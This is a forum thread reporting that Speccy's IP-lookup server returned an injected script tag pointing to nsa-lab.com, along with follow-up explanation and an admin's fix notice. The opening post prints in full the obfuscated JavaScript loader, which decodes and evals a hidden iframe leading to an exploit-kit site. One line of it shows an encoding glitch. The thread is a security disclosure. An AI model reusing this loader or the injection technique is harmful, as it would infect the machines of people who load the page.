Jump to content
CCleaner Community Forums

Speccy querying a hacked page


keyboardNinja

Recommended Posts

While perusing the latest version of Speccy (1.10.248), I noticed something odd under Network.

 

"External IP Address <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx'>http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx

with the ending x's being the rest of my public IP.

 

speccyi.png

 

I didn't have a clue what this was, so I blindly copied the address (hxxp://www.nsa-lab.com/js.php < intentionally delinkified for this post) into Google Chrome to try and figure out what was going on.

 

When I do that, I get this:

avastu.png

 

The javascript is:

 

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,ring.fromCharCode)');var R=null;var h=document.styleSheets;var F = null;for(var f=0; f < h.length; f++){try{var Z = h[f].cssRules || h[f].rules;for(var m=0;m < Z.length; m++){var Q = Z.item ? Z.item(m) : Z[m];if(Q.selectorText!='#va')continue;x = (Q.cssText) ? Q.cssText : Q.style.cssText;R = "St" + x.match(/(ri[^")]+)/)[1]; F=Q.selectorText.substr(1);};} catch(e){};}L=new Date(2020,11,3,2,21,8);i=L.getSeconds()-4;var o=[i+114,i+93,i+110,i+28,i+61,i+57,i+30,i+94,i+107,i+96,i+117,i+30,i+55,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+97,i+104,i+111,i+97,i+28,i+119,i+114,i+93,i+110,i+28,i+67,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+61,i+37,i+55,i+112,i+110,i+117,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+67,i+37,i+55,i+121,i+28,i+95,i+93,i+112,i+95,i+100,i+28,i+36,i+97,i+37,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+94,i+107,i+96,i+117,i+28,i+57,i+28,i+67,i+55,i+121,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+28,i+97,i+104,i+111,i+97,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+115,i+110,i+101,i+112,i+97,i+36,i+30,i+56,i+101,i+98,i+110,i+93,i+105,i+97,i+28,i+111,i+110,i+95,i+57,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+28,i+115,i+101,i+96,i+112,i+100,i+57,i+35,i+45,i+44,i+35,i+28,i+100,i+97,i+101,i+99,i+100,i+112,i+57,i+35,i+45,i+44,i+35,i+28,i+111,i+112,i+117,i+104,i+97,i+57,i+35,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+54,i+100,i+101,i+96,i+96,i+97,i+106,i+55,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+54,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+55,i+104,i+97,i+98,i+112,i+54,i+44,i+55,i+112,i+107,i+108,i+54,i+44,i+55,i+35,i+58,i+56,i+43,i+101,i+98,i+110,i+93,i+105,i+97,i+58,i+30,i+37,i+55,i+121,i+121,i+114,i+93,i+110,i+28,i+68,i+57,i+44,i+55,i+98,i+113,i+106,i+95,i+112,i+101,i+107,i+106,i+28,i+97,i+36,i+37,i+119,i+115,i+100,i+101,i+104,i+97,i+36,i+68,i+39,i+39,i+28,i+56,i+28,i+45,i+44,i+44,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+114,i+93,i+110,i+28,i+111,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+35,i+101,i+98,i+110,i+93,i+105,i+97,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+111,i+110,i+95,i+35,i+40,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+57,i+35,i+100,i+101,i+96,i+96,i+97,i+106,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+57,i+35,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+104,i+97,i+98,i+112,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+112,i+107,i+108,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+115,i+101,i+96,i+112,i+100,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+100,i+97,i+101,i+99,i+100,i+112,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+111,i+37,i+55,i+121];b=eval("e" + F + "l");var D='';J=b®;for(var f=0; f < o.length; f++){O=b(o[f]);D+=J(O);}b(D);

 

 

Posted about it on the Staff forums at BleepingComputer.com, and Grinler (Lawrence Abrams) posted this:

 

Basically whats happening is that speccy is querying your ip address by going to this url:

 

http://speccy.piriform.com/ip/

 

 

The content being returned, though, is not only the ip address but a javascript.

 

<script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>

 

Speccy is 100% compromised. That javascript loads a exploit kit, which has now downloaded some malware onto my Virtual Machine.

 

Pretty sure this would be considered a critical security flaw.

 

-kN

Link to post
Share on other sites

Also,

 

I can see how this would affect people. If you save your report as XML and then load it, it will open Internet Explorer (or your other default browser) automatically and load the XML file. This will trigger the javascript to launch and boom you are infected.

Link to post
Share on other sites
  • Admin

Problem has been fixed. We're currently performing a full investigation into that server.

 

Please note that the software is fine and doesn't contain a virus, it's a fault on our Speccy server.

Link to post
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...